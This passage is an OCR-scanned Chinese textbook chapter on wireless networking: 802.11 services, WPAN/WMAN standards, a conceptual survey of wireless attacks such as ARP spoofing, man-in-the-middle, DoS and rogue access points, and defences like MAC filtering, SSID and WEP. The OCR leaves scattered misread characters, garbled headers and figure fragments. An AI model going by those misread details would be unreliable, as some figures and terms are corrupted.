分 发 〈distribution) 服务 决定 了 如 何 路 由 那些 发 送 给 基站 的 帧 。 如 果 帧 的 目标 对 于 基 
站 来 说 是 本 地 的 ， 则 该 帧 将 被 直接 发 送 到 空中 。 否 则 的 话 ， 它 们 必须 通过 DS 来 转发 。 

5) 融合 

如 果 一 帧 需要 通过 一 个 非 IEEE 802.11 的 网 络 来 发 送 ， 并 且 该 网 络 使 用 了 不 同 的 编 址 
方案 或 者 不 同 的 帧 格式 ， 则 通过 融合 〈integration) 服务 可 以 将 IEEE 802.11 格式 的 帧 翻译 
成 目标 网 络 所 要 求 的 帧 格式 。 

余下 的 4 种 服务 都 是 在 BSS 内 部 进行 的 。 当 关联 过 程 完成 之 后 ， 这 些 服务 才 可 能 会 用 
到 。 这 4 种 服务 如 下 。 


无 钱 网 经 倪 会 


克 乡 委 会 兹 大 理论 与 笑 践 


1) 认证 
因为 未 授权 的 站 很 容易 就 可 以 发 送 或 者 接收 无 线 通信 流量 ， 所 以 ， 任 何 一 个 站 必须 首 
先 证 明了 它 自己 的 身份 之 后 才 允 许 发 送 数据 即 认 证 (authentication)。 典 型 情况 下 ， 当 基站 
接受 了 一 个 移动 站 的 关联 请 求 之 后 ， 基 站 将 给 它 发 送 一 个 特殊 的 质询 帧 ， 以 确定 该 移动 站 
是 否 知道 原先 分 配给 它 的 密 钥 (口令 ); 移动 站 只 要 加 密 质 询 帧 ， 并 送 回 给 基站 ， 如 果 结 果 
正确 的 话 ， 就 可 以 证 明 它 是 知道 密 钥 的 ， 则 移动 站 就 被 完全 接纳 。 
2) 解除 认证 
如 果 一 个 原先 已 经 通过 认证 的 移动 站 要 离开 网 络 ， 则 它 需 要 解除 认证 
(deauthentication ) 。 

3) 私密 性 

如 果 在 无 线 LAN 上 发 送 的 信息 需要 保密 的 话 ， 则 它 必须 要 被 加 密 。 私 密 性 (privacy) 
服务 管理 加 密 和 解密 。 

4) 数据 投递 

最 后 , 真正 的 目的 是 为 了 传输 数据 ， 所 以 ， IEEE 802.11 必须 要 提供 一 种 传送 和 接收 数 
据 的 方法 即 数据 投递 〈data delivery)。IEEE 802.11 的 传输 过 程 不 保证 可 靠 性 ， 上 面 的 层 必 
须 处 理 检 错 和 纠 错 工作 。 


13.2 ”无 线 个 域 网 (WPAN) 


无 线 个 域 网 (Wireless Personal Area Network，WPAN) 是 当前 计算 机 网 络 发 展 最 为 迅 
速 的 领域 之 一 。WPAN 就 是 在 个 人 工作 或 生活 的 地 方 把 属于 个 人 使 用 的 电子 设备 〈 如 便携 
式 电 脑 `. 掌 上 电脑 、 便 携 式 打印 机 以 及 蜂窝 电话 等 ) 用 无 线 技术 连接 起 来 的 自 组 网 络 。WPAN 
可 以 是 一 个 人 使 用 ， 也 可 以 是 若干 人 共同 使 用 〈 例 如 ， 一 个 教研 小 组 的 几 位 教师 把 几米 范 
围 内 使 用 的 一 些 电子 设备 组 成 一 个 无 线 个 人 区 域 网 )。 这 些 电子 设备 可 以 很 方便 地 进行 通 
信 ， 并 且 解 决 了 用 导线 的 麻烦 。 

WPAN 的 IEEE 标准 都 由 IEEE 的 802.15 工作 组 制定 , 这 个 标准 也 是 包括 MAC 层 和 物 
理 层 这 两 层 的 标准 。WPAN 都 工作 在 2.4GHz 的 ISM 频段 。 

WPAN 被 广泛 关注 的 技术 及 其 标准 有 三 个 。 

1. IEEE 802.15.1 

IEEE 802.15.1 覆盖 了 蓝牙 (BlueTooth) 协 议 栈 的 物理 层 /媒体 接 入 控制 层 (PHY/MAC )。 

1998 年 5 月 ，5 家 世界 著名 的 IT 公司 爱立信 、IBM、 英 特 尔 、 诺 基 亚 和 东芝 联合 宣布 
了 “蓝牙 ”计划 ， 使 不 同 厂 家 的 便携 设备 在 没有 电缆 连接 时 ， 利 用 无 线 技术 在 近 距 离 范 围 
内 具有 相互 操作 的 性 能 。 随 后 这 5 家 公司 组 建 了 一 个 特殊 的 兴趣 组 织 〈SIG) 来 负责 此 项 
计划 的 开发 。 这 项 计划 一 经 公布 ， 就 得 到 了 包括 摩托 罗拉 、 朗 讯 、 康 柏 、 西 门 子 以 及 微软 
等 大 公司 在 内 的 近 2000 家 厂商 的 广泛 支持 和 采纳 。1999 年 7 月 蓝牙 SIG 推出 了 蓝牙 协议 
1.0 版 。 

IEEE 802.15.1 标准 是 由 IEEE 与 蓝牙 SIG 合作 共同 完成 的 。 源 于 蓝牙 v1.1 版 的 IEEE 
802.15.1 标准 已 于 2002 年 4 月 15 日 由 IEEE-SA 的 标准 部 门 批准 成 为 一 个 正式 标准 ， 它 可 
以 同 蓝牙 v1.1 完全 兼容 。 


IEEE 802.15.1 是 用 于 WPAN 的 无 线 媒体 接 入 控制 层 和 物理 层 规范 。 标 准 的 目标 在 于 
在 个 人 操作 空间 (POS ) 内 进行 无 线 通信 。 

2. IEEE 802.15.3a 

IEEE 802.15.3a 即 超 宽带 UWB (Ultra-Wide Band) 标准 。 

超 宽带 (UWB) 技术 起 源 于 20 世纪 50 年 代 末 ， 此 前 主要 作为 军事 技术 在 雷达 探测 和 
定位 等 应 用 领域 中 使 用 。 美 国 FCC 〈 联 邦 通信 委员 会 ) 于 2002 年 2 月 准许 该 技术 进入 民 
用 领域 ， 用 户 不 必 进 行 申 请 即 可 使 用 。 作 为 室内 通信 用 途 ，FCC 已 将 3.1 一 10.6GHz 频带 
向 UWB 通信 开放 。 

超 宽带 无 线 通信 技术 是 一 种 使 用 1GHz 以 上 带宽 的 无 线 通 信 技 术 ， 又 称 脉 冲 无 线 电 
(IR) 技术 。UWB 不 需要 载波 ， 而 是 利用 纳 秒 至 微 秒 级 的 非 正弦 波 窜 脉冲 来 传输 数据 ， 需 
占用 很 宽 的 频谱 范围 ， 有 效 传输 距离 在 10 米 以 内 ， 传 输 速 率 可 达 几 百 Mbps 甚至 更 高 。 

通常 把 相对 带宽 (信号 带宽 与 中 心 频率 之 比 ) 大 于 25% ， 而 且 中 心 频 率 大 于 500MHz 
的 宽带 称 为 超 宽带 。 

传统 的 “ 罕 带 ”和 “宽带 ”都 是 采用 无 线 电 频率 (RF ) 载波 来 传送 信号 ， 利 用 载波 的 
状态 变化 来 传输 信息 。 而 超 宽带 是 基带 传输 ， 通 过 发 送 代表 0 和 1 的 脉冲 无 线 电 信号 来 传 
送 数据 。 这 些 脉 冲 信 号 的 时 域 极 窄 ( 纳 秒 级 ), 频 域 极 宽 ( 数 Hz 到 数 GHz, 可 超过 10GHz)， 
其 中 的 低频 部 分 可 以 实现 穿 墙 通信 。 

关于 UWB 技术 主要 有 两 种 相互 竞争 的 标准 : 以 Intel 和 Texas Instrument 为 代表 的 
MBOA 标准 ， 主 张 采 用 多 频带 方式 来 实现 UWB 技术 ; 以 摩托 罗拉 为 代表 的 DS-UWB 标 
准 ， 主 张 采 用 单 频带 方式 来 实现 UWB 技术 。 

UWB 技术 有 如 下 几 个 突出 的 特点 : 

(1) 超 宽 带 技术 使 用 了 瞬间 高 速 脉 冲 ， 因 此 信和 号 的 频带 就 很 宽 ， 就 是 指 可 支持 100 一 
400Mbps 的 数据 率 。 可 用 于 小 范围 内 高 速 传送 图 像 或 DVD 质量 的 多 媒体 视频 文件 。 

(2) UWB 只 在 需要 传输 数据 时 才 发 送 脉冲 ， 信 号 的 功率 谱 密 度 极 低 ， 发 射 系统 比 现 
有 的 传统 无 线 电 技术 功 耗 低 得 多 。 在 高 速 通 信 时 系统 的 耗 电量 仅 为 几 百 kW 至 儿 十 mW。 
民用 的 UWB 设备 功率 一 般 是 传统 移动 电话 所 需 功率 的 /100 左右 ， 是 蓝牙 设备 所 需 功 率 
的 1/20 左右 ， 因 此 ，UWB 设备 在 电池 寿命 和 电磁 辐射 上 ， 相 对 于 传统 无 线 设 备 有 着 很 大 
的 优越 性 。 

(3) 由 于 UWB 的 脉冲 非常 短 ， 频 段 非常 宽 ， 因 此 能 避免 多 路 径 传输 的 信号 干扰 问题 ， 
同时 短 而 弱 的 脉冲 也 使 UWB 与 其 他 无 线 通信 技术 (802.11x、 微 波 等 ) 间 产生 干扰 的 可 能 
性 大 幅 降低 ， 因 此 可 与 其 他 技术 共存 。 

(4) 由 于 UWB 信号 射频 带宽 可 以 达到 1GHz 以 上 ， 它 的 发 射 功 率 谱 密度 很 低 ， 信 和 号 
隐蔽 在 环境 噪声 和 其 他 信号 之 中 ， 用 传统 的 接收 机 无 法 接收 和 识别 ， 必 须 采 用 与 发 端 一 臻 
的 扩 频 码 脉 冲 序列 才能 进行 解 调 ， 因 此 增加 了 系统 的 安全 性 。 

3. IEEE 802.15.4 

IEEE 802.15.4 即 低速 无 线 个 域 网 (Low-Rate Wireless Personal Area Network ， 
LR-WPAN)， 履 盖 了 ZigBee 协议 栈 的 物理 层 / 媒 体 接 入 控制 层 (PHY/MAC 层 )。 

IEEE 802.15.4 标准 主要 针对 低速 无 线 个 域 网 制定 。 该 标准 把 低能 量 消 耗 、 低 速率 传输 、 | 完 
低 成 本 作为 重点 目标 。 而 ZigBee 标准 是 在 IEEE 802.15.4 标准 基础 上 发 展 而 来 的 。IEEE | 13 


无 线 网 乡 妆 会 


克 乡 委 会 英 大 理论 与 笑 践 


802.15.4 定义 了 ZigBee 协议 栈 的 最 低 的 两 层 (物理 层 和 MAC 层 ), 而 上 面 的 两 层 (网 络 层 
和 应 用 层 ) 则 是 由 ZigBee 联盟 定义 的 。ZigBee 一 词 难 以 翻译 ， 来 源 于 蜂 群 使 用 的 赖 以 生 
存 和 发 展 的 通信 方式 。 蜜 蜂 通 过 跳 Z 形 ( 即 zigzag) 的 舞蹈 ， 来 通知 其 伙伴 所 发 现 的 新 食 
物 源 的 位 置 、 距 离 和 方向 等 信息 ， 因 此 就 把 ZigBee 作为 新 一 代 无 线 通 信 技 术 的 名 称 。 

ZigBee 技术 主要 用 于 各 种 电子 设备 (固定 的 、 便 携 的 或 移动 的 ) 之 间 的 无 线 通 信 ， 其 
主要 特点 是 通信 距离 短 (10 一 100m 之 间 ), 传输 数据 速率 低 , 功 耗 低 , 并 且 成 本 低廉 。ZigBee 
技术 有 如 下 主要 优点 。 

(1) 省 电 ( 功 耗 低 )。 两 节 五 号 电池 支持 长 达 6 个 月 到 两 年 左右 的 使 用 时 间 。 

(2) 可 靠 。 采 用 了 碰撞 避免 机 制 ， 同 时 为 需要 固定 带宽 的 通信 业务 预 留 专用 时 阶 ， 避 
免 发 送 数据 时 的 竞争 和 冲突 ; 节点 模块 之 间 具 有 自动 动态 组 网 的 功能 ， 信 息 在 整个 ZigBee 
网 络 中 通过 自动 路 由 的 方式 进行 传输 ， 从 而 保证 了 信息 传输 的 可 靠 性 。 

(3) 延迟 短 。 针 对 延迟 敏感 的 应 用 做 了 优化 ， 通 信 延 迟 和 从 休眠 状态 激活 的 延迟 都 非 
常 短 。 
(4) 网 络 容量 大 。 可 支持 达 65 000 个 节点 。 

(5) 安全 和 高 保密 性 。ZigBee 提供 了 数据 完整 性 检查 和 鉴 权 功能 ， 加 密 算法 采用 通用 
的 AES-128。 


13.3 ”无线 城 域 网 (WMAN) 


20 世纪 90 年 代 ， 宽 带 无 线 接 入 技术 快速 发 展 起 来 , 但 是 相关 市 场 一 直 没有 繁荣 扩大 ， 
一 个 很 重要 的 原因 就 是 没有 统一 的 全 球 性 标准 。1999 年 , IEEE 成 立 了 IEEE 802.16 工作 组 
来 专门 研究 宽带 固定 无 线 接 入 技术 规范 ， 目 标 就 是 要 建立 一 个 全 球 统一 的 宽带 无 线 接 入 标 
准 。 为 了 促进 达成 这 一 目的 ， 几 家 世界 知名 企业 还 发 起 成 立 了 WiMAX (World 
Interoperability for Microwave Access) 论坛 ， 力 争 在 全 球 范围 推广 这 一 标准 。IEEE 802.16 
的 出 现 大 大 地 推动 了 宽带 无 线 接 入 技术 在 全 球 的 发 展 ， 特 别 是 WiMAX 论坛 的 发 展 壮大 ， 
强烈 地 刺激 了 市 场 的 发 展 。 

近年 来 无 线 城 域 网 WMAN 又 成 为 无 线 网 络 中 的 一 个 热点 ， 可 提供 “最 后 一 英里 ”的 
宽带 无 线 接 入 (固定 的 、 移 动 的 和 便携 的 )。 在 许多 情况 下 ， 无 线 城 域 网 可 用 来 代替 现 有 的 
有 线 宽带 接 入 ， 因 此 它 有 时 又 称 为 无 线 本 地 环 路 (wireless local loop)。 

现在 无 线 城 域 网 共有 两 个 正式 标准 。 一 个 是 2004 年 6 月 通过 了 802.16 的 修订 版 本 ， 
即 802.16d， 是 固定 宽带 无 线 接 入 空中 接口 标准 〈2 一 66GHz 频段 )。 另 一 个 是 2005 年 12 
月 通过 的 802.16 的 增强 版 本 , 即 802.16e, 是 支持 移动 性 的 宽带 无 线 接 入 空中 接口 标准 (2 一 
6GHz 频段 )， 在 其 频段 上 向 下 兼容 802.16d。 


13.4 无 线 网 络 面临 的 安全 威胁 


1， 窃 听 
无 线 网 络 易 遭 受 匿 名 黑客 的 攻击 ， 攻 击 者 可 以 截获 无 线 电信 号 并 解析 出 数据 。 用 于 无 


线 窃 听 的 设备 与 用 于 无 线 网 络 接 入 的 设备 相同 ， 这 些 设备 经 过 很 小 的 改动 就 可 以 被 设置 成 
截获 特定 无 线 信道 或 频率 额 数据 的 设备 。 这 种 攻击 行为 几乎 不 可 能 被 检测 到 。 通 过 使 用 天 
线 ， 攻 击 者 可 以 在 距离 目标 很 远 的 地 方 进行 攻击 。 窃 听 主要 用 于 收集 目标 网 络 的 信息 ， 包 
括 谁 在 使 用 网 络 、 能 访问 什么 信息 及 网 络 设备 的 性 能 等 。 很 多 常用 协议 通过 明文 传送 用 户 
名 和 密码 等 敏感 信息 ， 使 攻击 者 可 以 通过 截获 数据 获得 对 网 络 资源 的 访问 。 即 使 通信 被 加 
密 ， 攻 击 者 仍 可 以 收集 加 密 信息 用 于 以 后 的 分 析 。 很 多 加 密 算法 很 容易 被 破解 。 如 果 攻 击 
者 可 以 连接 到 无 线 网 络 上 ， 他 还 可 以 使 用 ARP 欺骗 进行 主动 窃听 。ARP 欺骗 实际 上 是 一 
种 作用 在 数据 链 路 层 的 中 间 人 攻击 , 攻击 者 通过 给 目标 主机 发 送 欺骗 ARP 数据 包 来 监听 通 
信 。 当 攻击 者 收 到 目标 主机 的 数据 后 ， 再 将 它 转 发 给 真正 的 目标 主机 。 这 样 ， 攻 击 者 可 以 
窃听 无 线 网 络 或 有 线 网 络 中 主机 间 的 通信 数据 。 

2. 通信 阻 断 

有 意 或 无 意 的 干扰 源 可 以 阻 断 通 信 。 对 整个 网 络 进 行 Dos 攻击 可 以 造成 通信 阻 断 ， 使 
包括 客户 端 和 基站 在 内 的 整个 区 域 的 通信 线路 堵塞 ， 造 成 设备 之 间 不 能 正常 通信 。 针 对 无 
线 网 络 的 DoS 攻击 则 很 难 预防 。 此 外 ， 大 部 分 无 线 网 络 通信 都 采用 公共 频段 ， 很 容易 受到 
来 自 其 他 设备 的 干扰 。 攻 击 者 可 以 采用 客户 端 阻 断 和 基站 阻 断 的 方式 来 阻 断 通信 。 攻 击 者 
可 能 通过 客户 端 阻 断 占用 或 假冒 被 阻 断 的 客户 端 ， 也 可 能 只 是 对 客户 端 发 动 DoS 攻击 ; 攻 
击 者 可 能 通过 基站 阻 断 假 冒 被 阻 断 的 基站 。 如 前 所 述 ， 有 很 多 设备 都 采用 公共 频道 进行 通 
信 ， 他 们 都 可 以 对 无 线 网 络 形成 干扰 。 所 以 ， 在 部 署 无 线 网 络 前 ， 电 信 运 营 商 一 定 要 进行 
站 点 调查 ， 以 验证 现 有 设备 不 会 对 无 线 网 络 形成 干扰 。 

3. 数据 的 注入 和 算 改 

黑客 通过 向 已 有 连接 中 注入 数据 来 截获 连接 或 发 送 恶 意 数 据 和 命令 。 攻 击 者 能 够 通过 
基站 插入 数据 或 命令 来 算 改 控制 信息 ， 造 成 用 户 连 接 中 断 。 数 据 注 入 可 被 用 做 DoS 攻击 。 
攻击 者 可 以 向 网 络 接 入 点 发 送 大 量 连接 请 求 包 ， 使 接 入 点 用 户 连 接 数 超标 ， 以 此 造成 接 入 
点 拒绝 合法 用 户 的 访问 。 如 果 上 层 协议 没有 提供 实时 数据 完整 性 检测 ， 在 连接 中 注入 数据 
也 是 可 能 的 。 

4. 中 间 人 攻击 

中 间 人 攻击 与 数据 注入 攻击 类 型 所 不 同 的 是 它 可 以 采取 多 种 形式 ， 主 要 是 为 了 破坏 会 
话 的 机 密 性 和 完整 性 。 中 间 人 攻击 比 大 多 数 攻击 更 复杂 , 攻击 者 需要 对 网 络 有 深入 的 了 解 。 
攻击 者 通常 伪装 成 网 络 资源 ， 当 受害 者 开始 建立 连接 时 ， 攻 击 者 会 截取 连接 ， 并 与 目的 端 
建立 连接 ， 同 时 将 所 有 通信 经 攻击 主机 代理 到 目的 端 。 这 时 ， 攻 击 者 就 可 以 注入 数据 、 修 
改 通信 数据 或 进行 窃听 攻击 。 

S. 客户 端 伪装 

通过 对 客户 端的 研究 ， 攻 击 者 可 以 模仿 或 克隆 客户 端的 身份 信息 ， 以 试图 获得 对 网 络 
或 服务 的 访问 。 攻 击 者 也 可 以 通过 窃取 的 访问 设备 来 访问 网 络 。 要 保证 所 有 设备 的 物理 安 
全 非常 困难 ， 当 攻击 者 通过 窃取 的 设备 发 起 攻击 时 ， 通 过 第 二 层 访 问 控制 手段 来 限制 对 资 
源 的 访问 都 将 失去 作用 。 

6. 接 入 点 伪装 

高 超 的 攻击 者 可 以 伪装 接 入 点 。 客 户 端 可 能 在 未 察觉 的 情况 下 连接 到 该 接 入 点 ， 并 泄 
露 机 密 认 证 信息 。 这 种 攻击 方式 可 以 与 上 面 描述 的 接 入 点 通信 阻 断 攻 击 方式 结合 起 来 使 用 。 


无 钱 网 经 倪 会 


克 乡 人 会 页 大 理论 与 笑 践 


7. 匿名 攻击 

攻击 者 可 以 隐藏 在 无 线 网 络 覆 盖 的 任何 角落 ， 并 保持 匿名 状态 ， 这 使 定位 和 犯罪 调查 
变 得 异常 困难 。 一 种 常见 的 匿名 攻击 称 为 沿街 扫描 ， 指 攻击 者 在 特定 的 区 域 扫描 并 搜寻 开 
放 的 无 线 网 络 。 这 个 名 称 来 自 一 种 古老 的 拨号 攻击 方式 一 一 沿街 扫描 ， 即 通过 拨打 不 通 的 
电话 号 码 来 查找 Modem 或 其 他 网 络 入 口 。 值 得 注意 的 是 ， 许 多 攻击 者 发 动 匿名 攻击 不 是 
为 了 攻击 无 线 网 络 本 身 ， 只 是 为 了 找到 接 入 Intemet 并 攻击 其 他 机 器 的 跳板 。 因 此 ， 随 着 
匿名 接 入 者 的 增多 ， 针 对 Intemet 的 攻击 也 会 增加 。 

8. 客户 端 对 客户 端的 攻击 

在 无 线 网 络 上 ， 一 个 客户 端 可 以 对 另 一 客户 端 进行 攻击 。 没 有 部 署 个 人 防火 墙 或 进行 
加 固 的 客户 端 如 果 受 到 攻击 ， 很 可 能 会 泄露 用 户 名 和 密码 等 机 密 信息 。 攻 击 者 可 以 利用 这 
些 信息 获得 对 其 他 网 络 资源 的 访问 权限 。 在 对 等 模式 下 ， 攻 击 者 可 以 通过 发 送 伪 造 路 由 协 
议 报 文 以 产生 通路 循环 来 实施 拒绝 服务 攻击 ,或 者 通过 发 送 伪造 路 由 协议 报 文生 成 黑洞 ( 吸 
收 和 扎 掉 数据 报 文 ) 来 实现 各 种 形式 的 攻击 。 

9. 隐匿 无 线 信道 

网 络 的 部 署 者 在 设计 和 评估 网 络 时 ， 需 要 考虑 隐匿 无 线 信道 的 问题 。 由 于 硬件 无 线 接 
入 点 的 价格 逐渐 降低 ， 以 及 可 以 通过 在 装 有 无 线 网 卡 的 机 器 上 安装 软件 来 实现 无 线 接 入 点 
的 功能 ， 隐 匿 无 线 信道 的 问题 日 趋 严重 。 网 络 管理 员 应 该 及 时 检查 网 络 上 存在 的 一 些 设置 
有 问题 或 非法 部 署 的 无 线 网 络 设备 。 这 些 设 备 可 以 在 有 线 网 络 上 制造 黑客 入 侵 的 后 门 ， 使 
攻击 者 可 以 在 离 网 络 很 远 的 地 点 实施 攻击 。 

10. 服务 区 标志 符 的 安全 问题 

服务 区 标志 符 〈SSID) 是 无 线 接 入 点 用 于 标识 本 地 无 线 子 网 的 标识 符 。 如 果 一 个 客户 
端 不 知道 服务 区 标志 符 ， 接 入 点 会 拒绝 该 客户 端 对 本 地 子 网 的 访问 。 当 客户 端 连接 到 接 入 
点 上 时 ， 服 务 区 标志 符 的 作用 相当 于 一 个 简单 的 口令 ， 起 到 一 定 的 安全 防护 作用 。 如 果 接 
入 点 被 设置 成 对 SSID 进行 广播 ,那么 所 有 的 客户 端 都 可 以 接收 到 它 并 用 其 访问 无 线 网 络 。 
而 且 , 很 多 接 入 点 都 采用 出 厂 时 默认 设置 的 SSID 值 ， 黑 客 很 容易 通过 Internet 查 到 这 些 默 
认 值 。 黑 客 获 得 这 些 SSID 值 后 ， 就 可 以 对 网 络 实施 攻击 。 因 此 ，SSID 不 能 作为 保障 安全 
的 主要 手段 。 

11. 漫游 造成 的 问题 

无 线 网 络 与 有 线 网 络 的 主要 区 别 在 于 无 线 终端 的 移动 性 。 在 CDMA、GSM 和 无 线 以 
太 网 中 ， 漫 游 机 制 都 是 相似 的 。 很 多 TCP/IP 服务 都 要 求 客户 端 和 服务 端的 IP 地 址 保持 不 
变 ， 但 是 ， 当 用 户 在 网 络 中 移动 时 ， 不 可 避免 地 会 离开 一 个 子 网 而 加 入 另 一 个 子 网 ， 这 就 
要 求 无 线 网 络 提供 漫游 机 制 。 移 动 IP 的 基本 原理 在 于 地 点 注册 和 报 文 转发 , 一 个 与 地 点 无 
关 的 地 址 用 于 保持 TCP/IP 连接 ， 而 另 一 个 随地 点 变化 的 临时 地 址 用 于 访问 本 地 网 络 资源 。 
在 移动 IP 系统 中 ， 当 一 个 移动 节点 漫游 到 一 个 网 络 时 , 就 会 获得 一 个 与 地 点 有 关 的 临时 地 
址 ， ee 
的 接 入 情况 。 所 属地 代理 将 所 有 发 往 移动 节点 的 数据 包 转 发 到 外 地 代理 上 。 这 种 机 制 会 
来 一 些 问题 : 首先 ， 攻 击 者 可 以 通过 对 注册 过 程 的 重 放 来 获取 发 送 到 移动 节点 的 数据 ; 其 
次 ， 攻 击 者 也 可 以 模拟 移动 节点 以 非法 获取 网 络 资源 。 


13.5 ”无线 局 域 网 的 安全 技术 


无 线 局 域 网 的 安全 技术 包括 物理 地 址 (MAC) 过 滤 ， 服 务 区 标志 符 〈SSID) 匹配 ， 连 
线 对 等 保密 (WEP) 等 。 
13.5.1 物理 地 址 过 滤 

每 个 无 线 客户 端 网 卡 都 有 唯一 的 48b 物理 地 址 (MAC) 标志 ， 可 在 AP 中 手工 维护 一 
组 允许 访问 的 MAC 地 址 列表 ， 实 现 物 理 地 址 过 滤 。 物 理 地 址 过 滤 属 于 硬件 认证 ， 而 不 是 
用 户 认证 。 这 种 方式 要 求 AP 中 的 MAC 地 址 列表 必须 随时 更 新 。 如 果 用 户 增加 ， 则 扩展 
能 力 变 差 ， 其 效率 会 随 着 终端 数目 的 增加 而 降低 ， 因 此 只 适用 于 小 型 网 络 规模 。 

非法 用 户 通过 网 络 监听 就 可 获得 合法 的 MAC 地 址 表 ， 而 MAC 地 址 并 不 难 修改 ， 因 
而 非法 用 户 完全 可 以 通过 盗用 合法 用 户 的 MAC 地 址 非法 接 入 。 物 理 地 址 过 滤 如 图 13-1 


所 示 。 
< MAC 000EC112E2BC 


< 


MAC 00EF0AB12EC8 


< 


MAC 0C00AB1238BC 


MAC 地 址 控制 接 入 表 
MAC 00EF0OAB12EC8 
MAC 000EC112E2BC 
MAC 0CO0AB1166BC 


图 13-1 MAC 地 址 过 滤 


13.5.2 ”服务 区 标识 符 匹 配 


无 线 客户 端 必须 设置 与 无 线 访问 点 AP 相同 的 SSID 才能 访问 他。 利用 SSID 设置 ， 可 
以 很 好 地 进行 用 户 群 体 分 组 ， 避 免 任意 漫游 带 来 的 安全 和 访问 性 能 降低 的 问题 。 可 以 通过 
设置 隐藏 接 入 点 (AP) 及 SSID 区 域 的 划分 和 权限 控制 来 达到 保密 的 目的 ， 因 此 可 以 认为 
SSID 是 一 个 简单 的 口令 , 通过 提供 口令 认证 机 制 , 确保 一 定 程度 的 安全 。 服 务 区 标志 匹配 
如 图 13-2 所 示 。 

如 果 配 置 AP 向 外 广播 其 SSID， 那 么 安全 程度 将 下 降 ; 因为 一 般 情况 下 用 户 自 己 配置 
客户 端 系统 ， 很 多 人 都 知道 该 SSID， 所 以 很 容易 共享 给 非法 用 户 。 

有 的 厂家 支持 所 有 SSID 方式 , 只 要 无 线 工 作 站 在 某 个 AP 范围 内 , 客户 端 都 会 自动 连 
接 到 AP， 这 将 跳 过 SSID 安全 功能 。 
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ESS ID: Groupl 


ESS ID: Group2 


ESS ID :Groupl ESS ID:Group2 


图 13-2 服务 区 标识 匹配 


13.5.3 连 线 对 等 保密 


IEEE 802.11b 标准 定义 了 一 个 加 密 协 议 WEP (Wired Equivalent Privacy)， 用 来 对 无 线 
局 域 网 中 的 数据 流 提供 安全 保护 。 该 协议 采用 RC4 流 加 密 算 法 ， 能 提供 的 功能 主要 包括 以 
下 几 点 。 

(1) 访问 控制 ， 防 止 没有 WEP 密 钥 的 非法 用 户 访问 网 络 。 

(2) 保护 隐私 ;: 通过 加 密 手段 保护 无 线 局 域 网 上 传输 的 数据 。 

1. WEP 加 密 过 程 

WEP 加 密 过 程 如 图 13-3 所 示 。 从 图 中 可 以 看 出 ， 在 对 明文 数据 的 处 理 上 采用 了 两 种 
运算 : 一 是 对 明文 进行 的 流 加 密 运 算 〈 即 异 或 运算 ); 二 是 为 了 防止 数据 被 非法 算 改 而 进行 
的 数据 完整 性 检查 向 量 (ICV) 运算 。 

(1) 40b 的 加 密 密 钥 与 24b 的 初始 向 量 (IV) 结合 在 一 起 ， 形 成 64b 长 度 的 密 钥 。 

(2) 生成 的 64b 密 钥 被 输入 到 伪 随 机 数 生成 器 (PRNG) 中 。 

(3) 伪 随 机 数 生成 器 输出 一 个 伪 随 机 密 钥 序列 。 

(4) 生成 的 序列 与 数据 进行 位 异 或 运算 ， 形 成 密 文 。 

为 了 保证 数据 不 被 非法 算 改 ， 一 种 完整 性 算法 (CRC32) 会 应 用 在 明文 上 ， 生 成 32b 
的 ICV。 明 文 与 32b 的 ICV 合并 后 被 加 密 ， 密 文 与 IV 一 起 被 传输 到 目的 地 。 


春 入 -| 
初始 向 最 一 | 全 | 知人 | 全 随机 数 初始 向 量 
窗 负 并 生成 器 | 密 铀 序列 
密 文 
-三 
完整 性 算法 [Jv | 并 


图 13-3 WEP 加 密 过 程 


2. WEP 解密 过 程 

WEP 解密 过 程 如 图 13-4 所 示 ， 为 了 对 数据 流 进行 解密 ，WEP 进行 如 下 操作 : 

(1) 接收 到 的 IV 被 用 来 产生 密 钥 序列 。 

(2) 加 密 数据 与 密 钥 序列 一 道 产生 解密 数据 和 ICV。 

(3) 解密 数据 通过 数据 完整 性 算法 生成 ICV。 

(4) 将 生成 的 ICV 与 接收 到 的 ICV 进行 比较 。 如 果 不 一 致 ， 将 错误 信息 报告 给 发 送 方 。 
密 钥 
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图 13-4 WEP 解密 过 程 
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3. WEP 认证 方法 

一 个 客户 端 如 果 没 有 被 认证 ， 将 无 法 接 入 无 线 局 域 网 ， 因 此 必须 在 客户 端 设置 认证 方 
式 ， 而 且 该 方式 应 与 接 入 点 采用 的 方式 兼容 。IEEE 802.11b 标准 定义 了 两 种 认证 方式 ， 开 
放 系统 认证 和 共享 密 钥 认证 。 

1) 开放 系统 认证 

开放 系统 认证 是 IEEE 802.11 协议 采用 的 默认 认证 方式 。 开 放 系统 认证 对 请 求 认证 的 
任何 人 提供 认证 。 整个 认证 过 程 通过 明文 传输 完成 ， 即 使 某 个 客户 端 无 法 提供 正确 的 WEP 
密 钥 ， 也 能 与 接 入 点 建立 联系 。 

2) 共享 密 钥 认 证 

共享 密 钥 认证 采用 标准 的 挑战 /响应 机 制 ， 以 共享 密 钥 来 对 客户 端 进行 认证 。 该 认证 方 
式 允 许 移动 客户 端 使 用 一 个 共享 密 钥 来 加 密 数据 。WEP 允许 管 。 jg 和 
理 员 定义 共享 密 钥 。 没 有 共享 密 钥 的 用 户 将 被 拒绝 访问 。 用 于 加 
密 和 解密 的 密 钥 也 被 用 于 提供 认证 服务 ， 但 这 会 带 来 安全 隐患 。 
与 开放 系统 认证 相 比 , 共享 密 钥 认证 方式 能 够 提供 更 好 的 认证 服 挑战 
务 。 如 果 一 个 客户 端 采 用 这 种 认证 方式 ， 客 户 端 必须 支持 WEP。 | 
WEP 认证 过 程 如 图 13-5 所 示 。 挑战 回应 

4. WEP 密 钥 管理 认证 确 I 

共享 密 钥 被 存储 在 每 个 设备 的 管理 信息 数据 库 中 。 虽然 | 一 | 
IEEE 802.11 标准 没有 指出 如 何 将 密 钥 分 发 到 各 个 设备 上 ， 但 它 
提 到 了 两 种 解决 方案 : 

(1) 各 设备 与 接 入 点 共享 一 组 共 4 个 默认 密 钥 。 

(2) 每 个 设备 与 其 他 设备 建立 密 钥 对 关系 。 

第 一 种 方案 提供 了 4 个 密 钥 。 如 果 一 个 客户 端 获得 了 这 些 默 认 密 钥 ， 该 客户 端 就 可 以 
与 整个 子 系统 的 所 有 设备 进行 通信 。 客 户 端 或 接 入 点 可 以 采用 这 4 个 密 钥 中 的 任意 一 个 来 
实施 加 密 和 解密 运算 。 这 种 方案 的 缺点 是 : 如果 默 认 密 钥 被 广泛 分 发 , 它们 就 可 能 被 泄漏。 

第 二 种 方案 中 ， 每 个 客户 端 都 要 与 其 他 所 有 设备 建立 一 个 密 钥 对 映射 表 ， 每 个 不 同 的 


认证 请 求 


图 13-5 ”WEP 认证 过 程 
